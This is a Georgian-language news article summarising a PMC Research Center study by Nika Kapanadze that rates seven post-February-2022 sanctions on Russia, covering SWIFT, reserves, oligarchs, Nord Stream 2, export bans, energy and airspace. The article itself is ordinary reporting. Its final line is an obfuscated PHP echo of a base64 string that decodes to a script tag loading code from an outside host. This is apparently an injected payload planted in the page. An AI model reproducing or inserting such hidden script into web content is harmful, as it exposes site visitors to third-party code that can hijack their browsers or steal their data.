celsiusi
ავერსი საქკაბელი
PMC კვლევითი ცენტრმა რუსეთის წინააღმდეგ დაწესებული სანქციების ეფექტიანობის შეფასება გამოაქვეყნა.
 
აღნიშნული კვლევა პუბლიკაციის სახით ცენტრის მკვლევარმა ნიკა კაპანაძემ წარადგინა, რაც 2022 წლის 24 თებერვლის შემდეგ რუსეთის წინააღმდეგ დაწესებული მნიშვნელოვანი 7 სანქციის მიმოხილვას და ამ სანქციების პოტენციური ეფექტიანობის შეფასებას მოიცავს. ესენია:
 
რუსული ფინანსური ინსტიტუტების SWIFT-დან გათიშვა
 
აღნიშნულ სანქციას მათი შეფასებით, მასშტაბი, მოულოდნელობა და ეკონომიკაზე მყისიერი შოკის გამოწვევის უნარი მაღალი ჰქონდა, რადგან ტრანზაქციები რუსეთის მხრიდან საკმაოდ მნიშვნელოვნად შეფერხდა. კვლევის მიხედვით, ამ სანქციის გაფართოების შესაძლებლობა დიდია, რადგან რუსეთში ჯერ ყველა ბანკი არ არის მოცული. კონკრეტულად ნაგულისხმებია "სბერბანკი" და "გაზპრომბანკი", რომელიც ევროკავშირის მიმართ ენერგო ტრანზაქციებს ახორციელებენ და ამის გამო ისინი ჯერ არ არის სვიფტიდან ჩახსნილი.
 
ამასთან, PMC კვლევითი ცენტრის მკვლევარი ნიკა კაპანაძე განმარტავს, რომ ევროკავშირის მეექვსე პაკეტი, რომელიც დაანონსდა და დამტკიცებული ჯერ არ არის, ამ სანქციებში "სბერბანკის" დამატებას მოიაზრებს თუმცა ეს რუსული ფინანსური სისტემის მთლიან იზოლირებას მაინც არ მოიცავს. ის ამბობს, რომ სანქციების გაფართოების ერთ-ერთი დიდი მიმართულება არა ცალკეული ბანკების, არამედ  მთლიანი სისტემის ფინანსური იზოლაცია იქნებოდა.
 
CBR-სთვის უცხოური ვალუტის რეზერვებზე წვდომის შეზღუდვა
 
რუსული ცენტრალური ბანკისთვის უცხოური ვალუტის რეზერვებზე წვდომის შეზღუდვა და ანგარიშის გაყინვა მაღალი საერთო ეფექტიანობით არის შეფასებული. მკვლევარები მიიჩნევენ, რუსეთისთვის ეს სანქცია მოულოდნელი იყო, რადგან მათ 600 მილიარდზე მეტი დოლარის რეზერვის დაახლოებით ნახევარი გაეყინათ, რაც რეალურად რუსეთს იმის საშუალებას უზღუდავს, რომ ეკონომიკურ შოკებზე რეაგირება მოახდინოს.
 
ინდივიდუალური სანქციები
 
რაც შეეხება ინდივიდუალურ სანქციებს, რომელიც ოლიგარქებზე და ასევე პუტინთან დაახლოებულ პირებზე დაწესებული სანქციებია, დაბალი ეფექტიანობით შეფასდა. PMC კვლევითი ცენტრში თვლიან, რომ ის პირები, რომლებზეც ეს სანქციები ვრცელდება, ქონებას უფრო მიუკვლევად ადგილებში ინახავენ და გრძელვადიან პერსპექტივაში ქონება ნაწილობრივ მაინც უნარჩუნდებათ.
 
 
Nord Stream 2-ის სერტიფიცირების შეჩერება
 
Nord Stream 2-ის გაზსადენის სერტიფიცირების შეჩერება გერმანიის მხრიდან დაბალი საერთო ეფექტიანობით შეფასდა, რადგან როგორც ცენტრის მკვლევარი ნიკა კაპანაძე განმარტავს, იმის გამო რომ პროექტი დაწყებული არ იყო, რუსეთს ამ პროექტიდან რეალური შემოსავალი არ ჰქონდა მიღებული.
 
სტრატეგიული საექსპორტო საქონლის აკრძალვები
 
აღნიშნული სანქცია, რუსეთის მიმართულებით ტექნოლოგიურ და ასევე სამხედრო ტიპის საქონლის ექსპორტის აკრძალვას გულისხმობს. ეს აკრძალვა საშუალო ეფექტურობით შეფასდა, რადგან მას მყისიერი ეფექტი არ აქვს. თუმცა მკვლევარები ფიქრობენ, რომ გრძელვადიან პერსპექტივაში მას მნიშვნელოვანი ეფექტი ექნება, რადგან სხვებთან შედარებით, ის ხელს შეუწყობს რუსეთის ტექნოლოგიურად და სამხედრო მიმართულებით ჩამორჩენას.
 
ენერგეტიკის სექტორის სანქციები
 
ენერგეტიკის სექტორის მიმართ დაწესებული სანქციები დაბალი საერთო ეფექტიანობით ფასდება. ამ სანქციების ჯგუფს გამოიყოფენ, როგორც ერთ-ერთი მნიშვნელოვანი ბლოკი. ამაში მოიაზრება აშშ-ს და  ბრიტანეთის მიერ რუსული ნავთობის იმპორტისა და ევროკავშირის მხრიდან რუსული ქვანახშირის იმპორტის აკრძალვა. 
 
როგორც ცენტრის მკვლევარი ნიკა კაპანაძე განმარტავს, ევროკავშირის მეექვსე პაკეტი, რომლის განხილვებიც ახლა მიმდინარეობს, რუსეთიდან ნავთობის იმპორტის ემბარგოს მოიაზრებს. თუმცა გარკვეული გარდამავალი პერიოდის გათვალისწინებით. სწორედ ესაა ის კონკრეტული პაკეტის ნაწილი, რომელზეც ყველაზე დიდი უთანხმოებაა, კერძოდ, ყველა წევრმა უნდა დაადასტუროს, რომ პაკეტი დამტკიცდეს. უნგრეთი, ჩეხეთი და სლოვაკეთი ამ პაკეტს ეწინააღმდეგებიან, რადგან ისინი ნავთობის კუთხით რუსეთზე უფრო მეტად არიან დამოკიდებული და მათ უფრო მეტი დრო სჭირდებათ რუსული ნავთობის იმპორტი შეამცირონ. ენერგეტიკის სექტორის სანქციები საერთო ჯამში დაბალი საერთო ეფექტიანობით ფასდება, რადგან ნარჩუნდება რუსეთიდან გაზის და ევროკავშირში ჯერჯერობით ნავთობის იმპორტი.
 
საჰაერო სივრცის დახურვა
 
ეს სანქცია გულისხმობს, საჰაერო სივრცის დახურვას ევროკავშირის და სხვა ქვეყნების მხრიდან რუსული ავიაკომპანიებისთვის. აღნიშნული სანქცია საშუალო საერთო ეფექტიანობით შეფასდა, რადგან ავიაციას რუსეთის ეკონომიკაში საკმაოდ დიდი ადგილი უკავია.
 
როგორც ცენტრის მკვლევარი ნიკა კაპანაძე განმარტავს, იმისთვის რომ რუსეთმა აგრესია შეწყვიტოს და ეკონომიკურად ომის მხარდაჭერა ვეღარ შეძლოს, არსებული სანქციების პაკეტი საკმარისი არ არის. სანქციების მთავარი გაფართოების მექანიზმად მან ნავთობის და გაზის იმპორტის ემბარგო და რუსული ფინანსური სისტემის მთლიანად იზოლირება დაასახელა.
872
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");